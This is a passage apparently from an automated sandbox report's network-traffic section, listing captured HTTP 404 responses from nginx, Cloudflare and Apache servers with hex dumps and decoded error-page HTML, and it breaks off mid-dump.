                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:22 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMcLC2ORiWh7piRBirqeAFWQkZ8SryRH366t50yY%2FP7Wpk1QZ%2BVre4YDwPv7cKODQaGo%2Fz3%2FpbjqYgWeV%2FqLYEYxJf89XDYTKlK6kUU2tn5V3OU%2BVcqsv7aOfDRPaZ5IRbw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15d5ea5cd078e7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1895&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZb
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:07:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKX7hwH%2Bi7ENN2Ve0ygdeHII8eWoAJUMwCztan0yCoA%2FLuRq%2B3R6Fd6fBi6h7daqxMQyNd2oTgMpdluwO36L129AOpXwT5Sg4%2BffglqRaLlbeeDYD3wmpB7xu8FhLnZt%2Bn8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15d5faffc58c47-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:07:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:08:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:08:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:08:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:08:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:08:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:08:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 